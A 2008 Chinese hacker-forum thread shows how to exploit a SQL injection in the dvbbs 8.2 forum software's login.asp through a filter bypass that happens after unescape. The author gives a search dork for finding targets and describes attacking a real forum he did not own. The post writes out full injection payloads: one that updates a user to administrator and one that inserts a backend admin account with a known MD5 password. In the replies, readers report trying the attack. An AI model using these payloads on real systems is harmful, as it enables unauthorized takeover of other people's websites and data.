‹‹ 上一主题 | 下一主题 ››
发新话题
打印

[ 原创]菜鸟也玩dvbbs 8.2 SQL注射漏洞

本主题由 小力 于 2008-8-23 20:49 移动
njj1127

黑色水银

三年级

Rank: 3Rank: 3Rank: 3

X永远捍卫者

帖子
500 
精华
2 
威望
10 度 
金币
1413 枚 
性别
男 
来自
黑客防线 
最后登录
2008-10-10 
1# 发表于 2008-6-2 03:30  只看该作者

[ 原创]菜鸟也玩dvbbs 8.2 SQL注射漏洞

菜鸟也玩dvbbs 8.2 SQL注射漏洞



水银[B.S.N]&[Z.S.T]
本文手发于黑客防线论坛,转载请著名出自http://www.54hssy.cn(作者博客)
  今天凌晨得到动网又出了漏洞,与和幻泉说了一下。经过这个牛人的分析其很快就将一个大站拿下于是身为菜鸟的我也不会放过这个机会就请教了他。下面先看看产生此漏洞的原因吧:
漏洞代码在login.asp 118行左右
......
username=trim(Dvbbs.CheckStr(request("username")))
If ajaxPro Then username = unescape(username)
......
取得的username是先经过检查然后再unescape解码,导致用urlencode模式就可以饶过任何检查,phpurldecode导致的注射很类似,譬如用%2527就可以提交’过去了.
漏洞描述(具体引用原文如下):
中国应用最广泛的论坛程序,最新dvbbs8.2的注入漏洞0day 包括官方版本在内的accesssql版本。漏洞存在源程序 login.asp
Login.asp 程序在检查隐藏值user用户名的登陆时没有过滤特殊符号,导致可以利用sql注入方式猜解出论坛管理员及所有用户的密码或者执行其它高级的sql语句直接威胁到服务器安全。
特别注意:admin等。。。必须在论坛有注册。。。
就是登陆名必须是已经在论坛注册了的。。
这里我仅对mssql数据库的进行测试,我构造了搜索语句“Powered By Dvbbs Version 8.2.0 填写登录信息”如图1
随便找了一个论坛http://forum.*******.net/首先注册一个帐户“heiseshuiyin”然后访问其登陆页面如图2

在用户名处写入“heiseshuiyin' and 'a'='a”密码随便登陆看到其返回信息如图3看用户名或密码不正确,然后我们在“heiseshuiyin' and 'a'='b”返回的信息如图4很明显我们能发现第一次提交正确和第二次提交的不正确时两者返回的信息有着明显的差别。就说明他是可以利用的。那我就来将我的帐户提升为管理员吧!在用户名处写入“';update dv_user set usergroupid=1 where username='heiseshuiyin'--”密码我就用正确的shuiyin来写然后写好后登陆看到反回的信息入图5我们可以看到登陆提示为“本论坛不存在该用户名”这个就说明我们所提升的帐户“heiseshuiyin”已经为管理员了。下面我们登陆看如图67
现在我们已经是前台管理员了。
那么怎样才能让我们的帐户具有后台权限呢?我们继续来到login.asp这个登陆页面。在用户名处写入“shuiyin';insert into dv_admin (username,password,flag,adduser) values

('shuiyin','a5258dfb597d7a1a','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,

24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45','shuiyin')--”其中的“a5258dfb597d7a1a”是“shuiyin”的MD5加密后的值,也就是说我们这里提升为后台管理权限的帐户的后台管理密码为“shuiyin”。之后我们看看能否登陆后台,哈哈RP还行,成功了如图89

接来呢就是看看能否拿到webshell甚至提权了。这里我就不搞了(我没弄到这个站的所以没写出来PS:不要砸我!)
好了其实这个漏洞并没有什么 ,至于ACCESS这个数据库的利用比较麻烦(本人比较懒就不搞了)就留给大家来玩吧!希望这篇菜鸟级的文章能给你一点收获。最后作个广告“我的BLOGhttp://www.54hssy.cn”。

[ 本帖最后由 njj1127 于 2008-6-2 12:48 编辑 ]
突破零方案菜鸟免费培训中
      水银’BLOG
想要免费空间来找网格时代

TOP

njj1127

黑色水银

三年级

Rank: 3Rank: 3Rank: 3

X永远捍卫者

帖子
500 
精华
2 
威望
10 度 
金币
1413 枚 
性别
男 
来自
黑客防线 
最后登录
2008-10-10 
2# 发表于 2008-6-2 03:31  只看该作者
图片不好加上来 想看我的BLOG上传的有.
不好意思了
突破零方案菜鸟免费培训中
      水银’BLOG
想要免费空间来找网格时代

TOP

少年游

一年级

Rank: 1

帖子
142 
精华
0 
威望
0 度 
金币
467 枚 
最后登录
2008-10-7 
3# 发表于 2008-6-2 14:15  只看该作者
呵呵
顶一下啊
看过了  试了下  可惜没进后台啊

问一下
“现在我们已经是前台管理员了。
那么怎样才能让我们的帐户具有后台权限呢?我们继续来到login.asp这个登陆页面。在用户名处写入“shuiyin';insert into dv_admin (username,password,flag,adduser) values('shuiyin','a5258dfb597d7a1a','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45','shuiyin')--”其中的“a5258dfb597d7a1a”是“shuiyin”的MD5加密后的值,也就是说我们这里提升为后台管理权限的帐户的后台管理密码为“shuiyin”。”
这句中在login.asp这个页面,用户名是上面的,密码是什么啊   是随便输入  还是真密码啊

先谢谢啊

TOP

music775775

三年级

Rank: 3Rank: 3Rank: 3

帖子
536 
精华
0 
威望
140 度 
金币
2124 枚 
性别
男 
最后登录
2008-10-11 
4# 发表于 2008-6-2 14:23  只看该作者
不错  测试以下

TOP

njj1127

黑色水银

三年级

Rank: 3Rank: 3Rank: 3

X永远捍卫者

帖子
500 
精华
2 
威望
10 度 
金币
1413 枚 
性别
男 
来自
黑客防线 
最后登录
2008-10-10 
5# 发表于 2008-6-2 19:19  只看该作者
随便什么都行 不过要看他有没有做长度限制
突破零方案菜鸟免费培训中
      水银’BLOG
想要免费空间来找网格时代

TOP

小帥

www.xshacker.com.cn

二年级

Rank: 2Rank: 2

www.xshacker.com.cn

帖子
337 
精华
1 
威望
0 度 
金币
797 枚 
性别
男 
来自
浙江杭州 
最后登录
2008-7-8 
6# 发表于 2008-6-3 21:31  只看该作者
acc呢。
http://www.xshacker.com.cn  小帥's blog
http://www.0kee.com/bbs     [0.S.T]零客网络安全小组

TOP

少年游

一年级

Rank: 1

帖子
142 
精华
0 
威望
0 度 
金币
467 枚 
最后登录
2008-10-7 
7# 发表于 2008-6-4 09:57  只看该作者
哦 谢谢了啊
再试试看
再说啊!!!!!!!!!

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题

Processed in 0.066608 second(s), 6 queries, Gzip enabled.